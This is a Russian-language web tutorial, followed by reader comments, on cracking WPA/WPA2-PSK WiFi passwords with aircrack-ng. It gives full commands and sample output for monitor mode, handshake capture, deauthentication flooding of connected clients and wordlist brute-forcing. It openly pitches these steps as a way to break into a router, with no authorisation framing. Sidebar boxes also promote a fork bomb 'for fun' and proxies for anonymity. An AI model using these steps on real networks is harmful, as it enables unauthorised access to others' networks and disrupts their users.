Если вы хотите узнать, как взломать WiFi роутер — просто прочтите эту пошаговую инструкцию по использованию aircrack-ng
, выполните ряд проверенных команд и с легкостью взломайте пароль от WiFi.
С помощью этих команд вы сможете взломать WiFi роутер с WPA/WPA2-PSK (pre-shared key) шифрованием.
Основа этого способа взлома WiFi заключается в перехвате WPA/WPA2 рукопожатия во время аутентификации и взломе PSK с помощью aircrack-ng
.
Как взломать WiFi — основные шаги:
- Установите последнюю версии
aircrack-ng
- Переведите беспроводной сетевой интерфейс в режим мониторинга с помощью
airmon-ng
- Запустите
airodump-ng
для перехвата рукопожатия на канале точки доступа с фильтрацией по BSSID - [Опционально] Используйте
aireplay-ng
для де-аутентификации клиента - Запустите
aircrack-ng
для взлома WPA/WPA2-PSK с помощью перехваченного рукопожатия
1. Aircrack-ng: Скачать и Установить
Только Последняя Версия: Если вы действительно хотите взломать WiFi — не стоит устанавливать устаревший aircrack-ng
из репозитория ваше операционной системы. Скачайте и скомпилируйте последнюю версию самостоятельно.
Установите необходимы зависимости:
$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev
Скачайте и установите последнюю версию aircrack-ng
(текущая версия):
$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz -O - | tar -xz $ cd aircrack-ng-1.2-rc4 $ sudo make $ sudo make install
Убедитесь что установлена именно последняя версия aircrack-ng
:
$ aircrack-ng --help Aircrack-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe http://www.aircrack-ng.org
2. Airmon-ng: Режим Мониторинга
Теперь необходимо перевести беспроводной сетевой интерфейс в режим мониторинга.Режим мониторинга позволяет компьютеру с беспроводным сетевым интерфейсом мониторить весь трафик в беспроводной сети.
Что особенно для нас важно, так это то, что режим мониторинга позволяет перехватывать все передающиеся пакеты без непосредственного подключения к какому-либо WiFi роутеру.
Найдите и остановите все процессы, которые могут помешать:
$ sudo airmon-ng check kill
Запустите беспроводной интерфейс в режиме мониторинга:
$ sudo airmon-ng start wlan0 Interface Chipset Driver wlan0 Intel 6235 iwlwifi - [phy0] (monitor mode enabled on mon0)
В приведенном выше примере, airmon-ng
создал новый беспроводной интерфейс mon0
и переключил его в режим мониторинга.
Таким образом, mon0
— это правильное имя интерфейса, которое мы будем использовать далее в этом руководстве.
3. Airodump-ng: Перехват Рукопожатия
Дельный Совет: Хотите немного «развлечься»? Создайте форк-бомбу в Linux! Одна маленькая строчка, способная повесить всю систему! Читать далее →
Теперь, когда беспроводной адаптер переведен в режим мониторинга, у нас появилась возможность видеть весь проходящий мимо нас трафик.
Это можно сделать с помощью команды airodump-ng
:
$ sudo airodump-ng mon0
Все видимые точки доступа показаны в верхней части экрана, а подключенные клиенты в нижней:
CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:11:22:33:44:55 -48 212 1536 66 1 54e WPA2 CCMP PSK CrackMe 66:77:88:99:00:11 -64 134 345 34 1 54e WPA2 CCMP PSK SomeAP BSSID STATION PWR Rate Lost Frames Probe 00:11:22:33:44:55 AA:BB:CC:DD:EE:FF -44 0 - 1 114 56 00:11:22:33:44:55 GG:HH:II:JJ:KK:LL -78 0 - 1 0 1 66:77:88:99:00:11 MM:NN:OO:PP:QQ:RR -78 2 - 32 0 1
Для того, чтобы поймать рукопожатие, определите интересующую вас точку доступа и запустите airodump-ng
на том же канале с фильтром по BSSID:
$ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one
Опция | Описание |
---|---|
-c |
Канал беспроводной сети |
--bssid |
MAC адрес точки доступа |
-w |
Префикс файла в который будет записано рукопожатие |
mon0 |
Сетевой интерфейс |
--ignore-negative-one |
Убирает сообщение ‘fixed channel : -1’ |
airodump-ng
словит рукопожатие.
Если вы хотите ускорить этот процесс — перейдите к шагу #4 и попытайтесь заставить подключенного беспроводного клиента переподключиться к роутеру.
По прошествию некоторого времени вы должны увидеть сообщение WPA handshake: 00:11:22:33:44:55
в правом верхнем углу экрана.
Это сообщение означает, что airodump-ng
успешно перехватил рукопожатие:
CH 1 ][ Elapsed: 45 s ][ 2014-05-29 13:15 WPA handshake: 00:11:22:33:44:55 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:11:22:33:44:55 -48 212 1536 66 1 54e WPA2 CCMP PSK CrackMe BSSID STATION PWR Rate Lost Frames Probe 00:11:22:33:44:55 AA:BB:CC:DD:EE:FF -44 0 - 1 114 56
4. Aireplay-ng: Деаутентификации Клиента
Дельный Совет: Хотите сохранить анонимность? Узнайте как использовать ПРОКСИ из командной строки в Linux. Читать далее →
Если вы не хотите ждать пока airodump-ng
перехватит рукопожатие, вы можете сами попробовать отправить сообщение клиенту, сказав что он больше не подключен к точке доступа.
После этого есть вероятность того, что беспроводной клиент попробует переподключиться и мы сможем перехватил рукопожатие.
Отправить широковещательное deauth сообщение:
$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one
Отправить направленное deauth сообщение (атака более эффективна когда направленна на конкретного клиента):
$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 --ignore-negative-one
Опция | Описание |
---|---|
--deauth 100 |
Сколько deauth сообщений отправить (0 — без ограничений) |
-a |
MAC адрес точки доступа |
-c |
MAC адрес клиента |
mon0 |
Сетевой интерфейс |
--ignore-negative-one |
Убирает сообщение ‘fixed channel : -1’ |
Дельный Совет: Нужно взломать пароль от WiFi? Не тратьте свое время попусту! Используйте «John the Ripper» — самый быстрый взломщик паролей! Читать далее →
5. Aircrack-ng: Взлом WiFi Пароля
К сожалению, кроме как с помощью грубой силы, не существует способа взлома WPA/WPA2-PSK шифрования.Для взлома WiFi необходим словарь с паролями для перебора.
Главное помните, что этот способ взлома настолько хорош, насколько хорош ваш словарь с паролями.
Некоторые словари можно скачать отсюда.
Выполните следующую команду, чтобы взломать WPA/WPA2-PSK:
$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap
Опция | Описание |
---|---|
-w |
Путь к словарю с паролями |
-b |
MAC адрес точки доступа |
WPAcrack.cap |
Файл, содержащий перехваченное рукопожатие |
Aircrack-ng 1.2 beta3 r2393 [00:08:11] 548872 keys tested (1425.24 k/s) KEY FOUND! [ 987654321 ] Master Key : 5C 9D 3F B6 24 3B 3E 0F F7 C2 51 27 D4 D3 0E 97 CB F0 4A 28 00 93 4A 8E DD 04 77 A3 A1 7D 15 D5 Transient Key : 3A 3E 27 5E 86 C3 01 A8 91 5A 2D 7C 97 71 D2 F8 AA 03 85 99 5C BF A7 32 5B 2F CD 93 C0 5B B5 F6 DB A3 C7 43 62 F4 11 34 C6 DA BA 38 29 72 4D B9 A3 11 47 A6 8F 90 63 46 1B 03 89 72 79 99 21 B3 EAPOL HMAC : 9F B5 F4 B9 3C 8B EA DF A0 3E F4 D4 9D F5 16 62
Дельный Совет: Взлом пароля часто занимает много времени. Объедините aircrack-ng
с «John The Ripper», чтобы иметь возможность ставить перебор на паузу без потери текущего прогресса! Читать далее →
Tengo que haccer un tp y no logro capturr un hanshake, espero que los nuevos parametros funcionen. Si funciona te aviso.
Очень и очень хорошая, а главное понятная, и интересная статья, автору респект!
Всё хорошо, хоть и пришлось изменить некоторые строки, но проблема в том, что при совершении шага 4 вся система просто перестаёт работать, приходится отказываться от использования aireplay-ng
После вызова aireplay-ng система полностью виснет, а так— всё хорошо
Who van give me a full packet of this , a setup with all-in-one install with one command in commandline terminal ??
# apt-get install aircrack-ng
if you dont have net-tools package pls run this:
# apt-get install net-tools